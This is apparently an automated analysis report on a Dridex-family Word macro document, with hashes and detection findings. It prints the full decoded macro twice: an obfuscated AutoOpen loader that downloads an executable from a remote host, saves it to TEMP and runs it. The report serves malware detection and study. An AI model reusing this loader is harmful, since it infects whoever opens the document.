Office (OLE) malware analysis — malicious · 1b0ab691ac932688

MALICIOUS

Office (OLE)

43.0 KB Created: 2015-03-10 03:23:00 Authoring application: Microsoft Office Word First seen: 2015-03-15

MD5: 04a1425948920060d48c0854f72740f9 SHA-1: 0d0d7e4cdb72b7ba67ebba43a110357c49416b03 SHA-256: 1b0ab691ac932688ebb7745248bdc4e14e16db2e6cd283c1bb860d26c4ef8954

316 Risk Score

Heuristics 9

ClamAV: Doc.Trojan.Dridex-13 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Dridex-13
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
.Write D8Hif8ju.ResponseBody
```
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
Set D8Hif8ju = CreateObject(ggSFhCPeLdOSshe(Chr$(84) & Chr$(86) & Chr$(78) & Chr$(89) & Chr$(84) & Chr$(85) & Chr$(119) & Chr$(121) & Chr$(76) & Chr$(108) & Chr$(78) & Chr$(108) & Chr$(99) & Chr$(110) & Chr$(90) & Chr$(108) & Chr$(99) & Chr$(108) & Chr$(104) & Chr$(78) & Chr$(84) & Chr$(69) & Chr$(104) & Chr$(85) & Chr$(86) & Chr$(70) & Chr$(65) & Chr$(61)))
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set D8Hif8ju = CreateObject(ggSFhCPeLdOSshe(Chr$(84) & Chr$(86) & Chr$(78) & Chr$(89) & Chr$(84) & Chr$(85) & Chr$(119) & Chr$(121) & Chr$(76) & Chr$(108) & Chr$(78) & Chr$(108) & Chr$(99) & Chr$(110) & Chr$(90) & Chr$(108) & Chr$(99) & Chr$(108) & Chr$(104) & Chr$(78) & Chr$(84) & Chr$(69) & Chr$(104) & Chr$(85) & Chr$(86) & Chr$(70) & Chr$(65) & Chr$(61)))

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

.SaveToFile Environ(ggSFhCPeLdOSshe(Chr$(86) & Chr$(69) & Chr$(86) & Chr$(78) & Chr$(85) & Chr$(65) & Chr$(61) & Chr$(61))) & ggSFhCPeLdOSshe(Chr$(88) & Chr$(71) & Chr$(82) & Chr$(122) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(105) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61)), 2

Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10052 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10052 bytes
SHA-256: `511595d92dc344205ca69c2ab02a7bd0115a4e5c758fd888cbdcbfd5ce31867e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() eHk End Sub Attribute VB_Name = "авпавп" Sub eHk() Set D8Hif8ju = CreateObject(ggSFhCPeLdOSshe(Chr$(84) & Chr$(86) & Chr$(78) & Chr$(89) & Chr$(84) & Chr$(85) & Chr$(119) & Chr$(121) & Chr$(76) & Chr$(108) & Chr$(78) & Chr$(108) & Chr$(99) & Chr$(110) & Chr$(90) & Chr$(108) & Chr$(99) & Chr$(108) & Chr$(104) & Chr$(78) & Chr$(84) & Chr$(69) & Chr$(104) & Chr$(85) & Chr$(86) & Chr$(70) & Chr$(65) & Chr$(61))) Set w2 = CreateObject(ggSFhCPeLdOSshe(Chr$(81) & Chr$(87) & Chr$(82) & Chr$(118) & Chr$(90) & Chr$(71) & Chr$(73) & Chr$(117) & Chr$(85) & Chr$(51) & Chr$(82) & Chr$(121) & Chr$(90) & Chr$(87) & Chr$(70) & Chr$(116))) D8Hif8ju.Open ggSFhCPeLdOSshe(Chr$(82) & Chr$(48) & Chr$(86) & Chr$(85)), ggSFhCPeLdOSshe(Chr$(97) & Chr$(72) & Chr$(82) & Chr$(48) & Chr$(99) & Chr$(72) & Chr$(77) & Chr$(54) & Chr$(76) & Chr$(121) & Chr$(56) & Chr$(53) & Chr$(77) & Chr$(105) & Chr$(52) & Chr$(50) & Chr$(77) & Chr$(121) & Chr$(52) & Chr$(52) & Chr$(79) & Chr$(67) & Chr$(52) & Chr$(120) & Chr$(77) & Chr$(68) & Chr$(73) & Chr$(118) & Chr$(89) & Chr$(88) & Chr$(66) & Chr$(112) & Chr$(76) & Chr$(50) & Chr$(100) & Chr$(105) & Chr$(77) & Chr$(83) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61)), False D8Hif8ju.SetOption 2, 13056 D8Hif8ju.Send Dim БQЗлСНпу As Integer For БQЗлСНпу = 0 To 7 Dim сбСлБwЗф As Integer For сбСлБwЗф = 0 To 7 Dim ЛqToфВФи As Integer For ЛqToфВФи = 0 To 1 DoEvents Next ЛqToфВФи DoEvents Next сбСлБwЗф Dim йбГWиПвк As Integer For йбГWиПвк = 0 To 5 DoEvents Next йбГWиПвк DoEvents Next БQЗлСНпу Dim ДяшКиМ As Integer For ДяшКиМ = 0 To 3 Dim быРИЭВи As Integer For быРИЭВи = 0 To 6 DoEvents Next быРИЭВи DoEvents Next ДяшКиМ Dim ЦмФМнГИй As Integer For ЦмФМнГИй = 0 To 1 DoEvents Next ЦмФМнГИй With w2 Dim qйКофДтБ As Integer For qйКофДтБ = 0 To 4 Dim ХЦИПQуQW As Integer For ХЦИПQуQW = 0 To 9 Dim ВфмхлФХМ As Integer For ВфмхлФХМ = 0 To 5 DoEvents Next ВфмхлФХМ DoEvents Next ХЦИПQуQW Dim ХЗыбЛипЛ As Integer For ХЗыбЛипЛ = 0 To 4 DoEvents Next ХЗыбЛипЛ DoEvents Next qйКофДтБ Dim лРWлкдмФ As Integer For лРWлкдмФ = 0 To 5 Dim ктуЕпwПм As Integer For ктуЕпwПм = 0 To 8 DoEvents Next ктуЕпwПм DoEvents Next лРWлкдмФ Dim оухйКИсБ As Integer For оухйКИсБ = 0 To 9 DoEvents Next оухйКИсБ .Type = 1 Dim нЗЙqеwХС As Integer For нЗЙqеwХС = 0 To 3 Dim оСФWйЕТЫ As Integer For оСФWйЕТЫ = 0 To 9 Dim иофНхугб As Integer For иофНхугб = 0 To 3 DoEvents Next иофНхугб DoEvents Next оСФWйЕТЫ Dim кВЙцИФлр As Integer For кВЙцИФлр = 0 To 3 DoEvents Next кВЙцИФлр DoEvents Next нЗЙqеwХС Dim рхqqИГос As Integer For рхqqИГос = 0 To 6 Dim сУГТапЗй As Integer For сУГТапЗй = 0 To 4 DoEvents Next сУГТапЗй DoEvents Next рхqqИГос Dim ыйQКфнва As Integer For ыйQКфнва = 0 To 3 DoEvents Next ыйQКфнва .Open Dim пwлагЦПЫ As Integer For пwлагЦПЫ = 0 To 4 Dim пРхфхКНФ As Integer For пРхфхКНФ = 0 To 4 Dim бицзлаки As Integer For бицзлаки = 0 To 3 DoEvents Next бицзлаки DoEvents Next пРхфхКНФ Dim АХаДизхх As Integer For АХаДизхх = 0 To 3 DoEvents Next АХаДизхх DoEvents Next пwлагЦПЫ Dim аЫСаттАл As Integer For аЫСаттАл = 0 To 2 Dim ХйwСТхКк As Integer For ХйwСТхКк = 0 To 4 DoEvents Next ХйwСТхКк DoEvents Next аЫСаттАл Dim ХйлМаООт As Integer For ХйлМаООт = 0 To 4 DoEvents Next ХйлМаООт .Write D8Hif8ju.ResponseBody Dim МхWМфпвW As Integer For МхWМфпвW = 0 To 4 Dim елЦпыйКф As Integer For елЦпыйКф = 0 To 6 Dim ОоАлГПРУ As Integer For ОоАлГПРУ = 0 To 8 DoEvents Next ОоАлГПРУ DoEvents Next елЦпыйКф Dim ХПоДОДсq As Integer For ХПоДОДсq = 0 To 1 DoEvents Next ХПоДОДсq DoEvents Next МхWМфпвW Dim тсчЛФвн As Integer For тсчЛФвн = 0 To 8 Dim ухЕЦтДЫХ As Integer For ухЕЦтДЫХ = 0 To 3 DoEvents Next ухЕЦтДЫХ DoEvents Next тсчЛФвн Dim УдлИЗЗСы As Integer For УдлИЗЗСы = 0 To 5 DoEvents Next УдлИЗЗСы .SaveToFile Environ(ggSFhCPeLdOSshe(Chr$(86) & Chr$(69) & Chr$(86) & Chr$(78) & Chr$(85) & Chr$(65) & Chr$(61) & Chr$(61))) & ggSFhCPeLdOSshe(Chr$(88) & Chr$(71) & Chr$(82) & Chr$(122) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(105) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61)), 2 Dim МхWВВхлг As Integer For МхWВВхлг = 0 To 7 Dim ЕлмнфРаЦ As Integer For ЕлмнфРаЦ = 0 To 7 Dim ыАЕЦасцТ As Integer For ыАЕЦасцТ = 0 To 6 DoEvents Next ыАЕЦасцТ DoEvents Next ЕлмнфРаЦ Dim влфдесас As Integer For влфдесас = 0 To 9 DoEvents Next влфдесас DoEvents Next МхWВВхлг Dim лбхМФрцН As Integer For лбхМФрцН = 0 To 5 Dim цыВхwАВС As Integer For цыВхwАВС = 0 To 3 DoEvents Next цыВхwАВС DoEvents Next лбхМФрцН Dim ЦпыГаАОА As Integer For ЦпыГаАОА = 0 To 7 DoEvents Next ЦпыГаАОА End With Set pP5hKP = CreateObject(ggSFhCPeLdOSshe(Chr$(85) & Chr$(50) & Chr$(104) & Chr$(108) & Chr$(98) & Chr$(71) & Chr$(119) & Chr$(117) & Chr$(81) & Chr$(88) & Chr$(66) & Chr$(119) & Chr$(98) & Chr$(71) & Chr$(108) & Chr$(106) & Chr$(89) & Chr$(88) & Chr$(82) & Chr$(112) & Chr$(98) & Chr$(50) & Chr$(52) & Chr$(61))) pP5hKP.Open Environ(ggSFhCPeLdOSshe(Chr$(86) & Chr$(69) & Chr$(86) & Chr$(78) & Chr$(85) & Chr$(65) & Chr$(61) & Chr$(61))) & ggSFhCPeLdOSshe(Chr$(88) & Chr$(71) & Chr$(82) & Chr$(122) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(105) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61)) End Sub Attribute VB_Name = "оокеаыв" Private Const clOneMask = 16515072 Private Const clTwoMask = 258048 Private Const clThreeMask = 4032 Private Const clFourMask = 63 Private Const clHighMask = 16711680 Private Const clMidMask = 65280 Private Const clLowMask = 255 Private Const cl2Exp18 = 262144 Private Const cl2Exp12 = 4096 Private Const cl2Exp6 = 64 Private Const cl2Exp8 = 256 Private Const cl2Exp16 = 65536 Public Function ggSFhCPeLdOSshe(sString As String) As String Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String Dim lTemp As Long sString = Replace(sString, vbCr, vbNullString) 'Get rid of the vbCrLfs. These could be in... sString = Replace(sString, vbLf, vbNullString) 'either order. lTemp = Len(sString) Mod 4 'Test for valid input. If lTemp Then Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.") End If If InStrRev(sString, "==") Then 'InStrRev is faster when you know it's at the end. iPad = 2 'Note: These translate to 0, so you can leave them... ElseIf InStrRev(sString, "=") Then 'in the string and just resize the output. iPad = 1 End If For lTemp = 0 To 255 'Fill the translation table. Select Case lTemp Case 65 To 90 bTrans(lTemp) = lTemp - 65 'A - Z Case 97 To 122 bTrans(lTemp) = lTemp - 71 'a - z Case 48 To 57 bTrans(lTemp) = lTemp + 4 '1 - 0 Case 43 bTrans(lTemp) = 62 'Chr(43) = "+" Case 47 bTrans(lTemp) = 63 'Chr(47) = "/" End Select Next lTemp For lTemp = 0 To 63 'Fill the 2^6, 2^12, and 2^18 lookup tables. lPowers6(lTemp) = lTemp * cl2Exp6 lPowers12(lTemp) = lTemp * cl2Exp12 lPowers18(lTemp) = lTemp * cl2Exp18 Next lTemp bIn = StrConv(sString, vbFromUnicode) 'Load the input byte array. ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1) 'Prepare the output buffer. For lChar = 0 To UBound(bIn) Step 4 lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _ lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3)) 'Rebuild the bits. lTemp = lQuad And clHighMask 'Mask for the first byte bOut(lPos) = lTemp \ cl2Exp16 'Shift it down lTemp = lQuad And clMidMask 'Mask for the second byte bOut(lPos + 1) = lTemp \ cl2Exp8 'Shift it down bOut(lPos + 2) = lQuad And clLowMask 'Mask for the third byte lPos = lPos + 3 Next lChar sOut = StrConv(bOut, vbUnicode) 'Convert back to a string. If iPad Then sOut = Left$(sOut, Len(sOut) - iPad) 'Chop off any extra bytes. ggSFhCPeLdOSshe = sOut End Function

SHA-256: 511595d92dc344205ca69c2ab02a7bd0115a4e5c758fd888cbdcbfd5ce31867e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
eHk
End Sub

Attribute VB_Name = "авпавп"

Sub eHk()
Set D8Hif8ju = CreateObject(ggSFhCPeLdOSshe(Chr$(84) & Chr$(86) & Chr$(78) & Chr$(89) & Chr$(84) & Chr$(85) & Chr$(119) & Chr$(121) & Chr$(76) & Chr$(108) & Chr$(78) & Chr$(108) & Chr$(99) & Chr$(110) & Chr$(90) & Chr$(108) & Chr$(99) & Chr$(108) & Chr$(104) & Chr$(78) & Chr$(84) & Chr$(69) & Chr$(104) & Chr$(85) & Chr$(86) & Chr$(70) & Chr$(65) & Chr$(61)))
Set w2 = CreateObject(ggSFhCPeLdOSshe(Chr$(81) & Chr$(87) & Chr$(82) & Chr$(118) & Chr$(90) & Chr$(71) & Chr$(73) & Chr$(117) & Chr$(85) & Chr$(51) & Chr$(82) & Chr$(121) & Chr$(90) & Chr$(87) & Chr$(70) & Chr$(116)))
D8Hif8ju.Open ggSFhCPeLdOSshe(Chr$(82) & Chr$(48) & Chr$(86) & Chr$(85)), ggSFhCPeLdOSshe(Chr$(97) & Chr$(72) & Chr$(82) & Chr$(48) & Chr$(99) & Chr$(72) & Chr$(77) & Chr$(54) & Chr$(76) & Chr$(121) & Chr$(56) & Chr$(53) & Chr$(77) & Chr$(105) & Chr$(52) & Chr$(50) & Chr$(77) & Chr$(121) & Chr$(52) & Chr$(52) & Chr$(79) & Chr$(67) & Chr$(52) & Chr$(120) & Chr$(77) & Chr$(68) & Chr$(73) & Chr$(118) & Chr$(89) & Chr$(88) & Chr$(66) & Chr$(112) & Chr$(76) & Chr$(50) & Chr$(100) & Chr$(105) & Chr$(77) & Chr$(83) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61)), False
D8Hif8ju.SetOption 2, 13056
D8Hif8ju.Send
Dim БQЗлСНпу As Integer
For БQЗлСНпу = 0 To 7
Dim сбСлБwЗф As Integer
For сбСлБwЗф = 0 To 7
Dim ЛqToфВФи As Integer
For ЛqToфВФи = 0 To 1
DoEvents
Next ЛqToфВФи
DoEvents
Next сбСлБwЗф
Dim йбГWиПвк As Integer
For йбГWиПвк = 0 To 5
DoEvents
Next йбГWиПвк
DoEvents
Next БQЗлСНпу
Dim ДяшКиМ As Integer
For ДяшКиМ = 0 To 3
Dim быРИЭВи As Integer
For быРИЭВи = 0 To 6
DoEvents
Next быРИЭВи
DoEvents
Next ДяшКиМ
Dim ЦмФМнГИй As Integer
For ЦмФМнГИй = 0 To 1
DoEvents
Next ЦмФМнГИй
With w2
Dim qйКофДтБ As Integer
For qйКофДтБ = 0 To 4
Dim ХЦИПQуQW As Integer
For ХЦИПQуQW = 0 To 9
Dim ВфмхлФХМ As Integer
For ВфмхлФХМ = 0 To 5
DoEvents
Next ВфмхлФХМ
DoEvents
Next ХЦИПQуQW
Dim ХЗыбЛипЛ As Integer
For ХЗыбЛипЛ = 0 To 4
DoEvents
Next ХЗыбЛипЛ
DoEvents
Next qйКофДтБ
Dim лРWлкдмФ As Integer
For лРWлкдмФ = 0 To 5
Dim ктуЕпwПм As Integer
For ктуЕпwПм = 0 To 8
DoEvents
Next ктуЕпwПм
DoEvents
Next лРWлкдмФ
Dim оухйКИсБ As Integer
For оухйКИсБ = 0 To 9
DoEvents
Next оухйКИсБ
.Type = 1
Dim нЗЙqеwХС As Integer
For нЗЙqеwХС = 0 To 3
Dim оСФWйЕТЫ As Integer
For оСФWйЕТЫ = 0 To 9
Dim иофНхугб As Integer
For иофНхугб = 0 To 3
DoEvents
Next иофНхугб
DoEvents
Next оСФWйЕТЫ
Dim кВЙцИФлр As Integer
For кВЙцИФлр = 0 To 3
DoEvents
Next кВЙцИФлр
DoEvents
Next нЗЙqеwХС
Dim рхqqИГос As Integer
For рхqqИГос = 0 To 6
Dim сУГТапЗй As Integer
For сУГТапЗй = 0 To 4
DoEvents
Next сУГТапЗй
DoEvents
Next рхqqИГос
Dim ыйQКфнва As Integer
For ыйQКфнва = 0 To 3
DoEvents
Next ыйQКфнва
.Open
Dim пwлагЦПЫ As Integer
For пwлагЦПЫ = 0 To 4
Dim пРхфхКНФ As Integer
For пРхфхКНФ = 0 To 4
Dim бицзлаки As Integer
For бицзлаки = 0 To 3
DoEvents
Next бицзлаки
DoEvents
Next пРхфхКНФ
Dim АХаДизхх As Integer
For АХаДизхх = 0 To 3
DoEvents
Next АХаДизхх
DoEvents
Next пwлагЦПЫ
Dim аЫСаттАл As Integer
For аЫСаттАл = 0 To 2
Dim ХйwСТхКк As Integer
For ХйwСТхКк = 0 To 4
DoEvents
Next ХйwСТхКк
DoEvents
Next аЫСаттАл
Dim ХйлМаООт As Integer
For ХйлМаООт = 0 To 4
DoEvents
Next ХйлМаООт
.Write D8Hif8ju.ResponseBody
Dim МхWМфпвW As Integer
For МхWМфпвW = 0 To 4
Dim елЦпыйКф As Integer
For елЦпыйКф = 0 To 6
Dim ОоАлГПРУ As Integer
For ОоАлГПРУ = 0 To 8
DoEvents
Next ОоАлГПРУ
DoEvents
Next елЦпыйКф
Dim ХПоДОДсq As Integer
For ХПоДОДсq = 0 To 1
DoEvents
Next ХПоДОДсq
DoEvents
Next МхWМфпвW
Dim тсчЛФвн As Integer
For тсчЛФвн = 0 To 8
Dim ухЕЦтДЫХ As Integer
For ухЕЦтДЫХ = 0 To 3
DoEvents
Next ухЕЦтДЫХ
DoEvents
Next тсчЛФвн
Dim УдлИЗЗСы As Integer
For УдлИЗЗСы = 0 To 5
DoEvents
Next УдлИЗЗСы
.SaveToFile Environ(ggSFhCPeLdOSshe(Chr$(86) & Chr$(69) & Chr$(86) & Chr$(78) & Chr$(85) & Chr$(65) & Chr$(61) & Chr$(61))) & ggSFhCPeLdOSshe(Chr$(88) & Chr$(71) & Chr$(82) & Chr$(122) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(105) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61)), 2
Dim МхWВВхлг As Integer
For МхWВВхлг = 0 To 7
Dim ЕлмнфРаЦ As Integer
For ЕлмнфРаЦ = 0 To 7
Dim ыАЕЦасцТ As Integer
For ыАЕЦасцТ = 0 To 6
DoEvents
Next ыАЕЦасцТ
DoEvents
Next ЕлмнфРаЦ
Dim влфдесас As Integer
For влфдесас = 0 To 9
DoEvents
Next влфдесас
DoEvents
Next МхWВВхлг
Dim лбхМФрцН As Integer
For лбхМФрцН = 0 To 5
Dim цыВхwАВС As Integer
For цыВхwАВС = 0 To 3
DoEvents
Next цыВхwАВС
DoEvents
Next лбхМФрцН
Dim ЦпыГаАОА As Integer
For ЦпыГаАОА = 0 To 7
DoEvents
Next ЦпыГаАОА
End With
Set pP5hKP = CreateObject(ggSFhCPeLdOSshe(Chr$(85) & Chr$(50) & Chr$(104) & Chr$(108) & Chr$(98) & Chr$(71) & Chr$(119) & Chr$(117) & Chr$(81) & Chr$(88) & Chr$(66) & Chr$(119) & Chr$(98) & Chr$(71) & Chr$(108) & Chr$(106) & Chr$(89) & Chr$(88) & Chr$(82) & Chr$(112) & Chr$(98) & Chr$(50) & Chr$(52) & Chr$(61)))
pP5hKP.Open Environ(ggSFhCPeLdOSshe(Chr$(86) & Chr$(69) & Chr$(86) & Chr$(78) & Chr$(85) & Chr$(65) & Chr$(61) & Chr$(61))) & ggSFhCPeLdOSshe(Chr$(88) & Chr$(71) & Chr$(82) & Chr$(122) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(105) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61))
End Sub



Attribute VB_Name = "оокеаыв"
Private Const clOneMask = 16515072
Private Const clTwoMask = 258048
Private Const clThreeMask = 4032
Private Const clFourMask = 63
Private Const clHighMask = 16711680
Private Const clMidMask = 65280
Private Const clLowMask = 255
Private Const cl2Exp18 = 262144
Private Const cl2Exp12 = 4096
Private Const cl2Exp6 = 64
Private Const cl2Exp8 = 256
Private Const cl2Exp16 = 65536

Public Function ggSFhCPeLdOSshe(sString As String) As String
    Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
    Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
    Dim lTemp As Long
    sString = Replace(sString, vbCr, vbNullString)      'Get rid of the vbCrLfs.  These could be in...
    sString = Replace(sString, vbLf, vbNullString)      'either order.
    lTemp = Len(sString) Mod 4                          'Test for valid input.
    If lTemp Then
        Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")
    End If
    If InStrRev(sString, "==") Then                     'InStrRev is faster when you know it's at the end.
        iPad = 2                                        'Note:  These translate to 0, so you can leave them...
    ElseIf InStrRev(sString, "=") Then                  'in the string and just resize the output.
        iPad = 1
    End If
    For lTemp = 0 To 255                                'Fill the translation table.
        Select Case lTemp
            Case 65 To 90
                bTrans(lTemp) = lTemp - 65              'A - Z
            Case 97 To 122
                bTrans(lTemp) = lTemp - 71              'a - z
            Case 48 To 57
                bTrans(lTemp) = lTemp + 4               '1 - 0
            Case 43
                bTrans(lTemp) = 62                      'Chr(43) = "+"
            Case 47
                bTrans(lTemp) = 63                      'Chr(47) = "/"
        End Select
    Next lTemp
    For lTemp = 0 To 63                                 'Fill the 2^6, 2^12, and 2^18 lookup tables.
        lPowers6(lTemp) = lTemp * cl2Exp6
        lPowers12(lTemp) = lTemp * cl2Exp12
        lPowers18(lTemp) = lTemp * cl2Exp18
    Next lTemp
    bIn = StrConv(sString, vbFromUnicode)               'Load the input byte array.
    ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)       'Prepare the output buffer.
    For lChar = 0 To UBound(bIn) Step 4
        lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
                lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))           'Rebuild the bits.
        lTemp = lQuad And clHighMask                    'Mask for the first byte
        bOut(lPos) = lTemp \ cl2Exp16                   'Shift it down
        lTemp = lQuad And clMidMask                     'Mask for the second byte
        bOut(lPos + 1) = lTemp \ cl2Exp8                'Shift it down
        bOut(lPos + 2) = lQuad And clLowMask            'Mask for the third byte
        lPos = lPos + 3
    Next lChar
    sOut = StrConv(bOut, vbUnicode)                     'Convert back to a string.
    If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)   'Chop off any extra bytes.
    ggSFhCPeLdOSshe = sOut
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.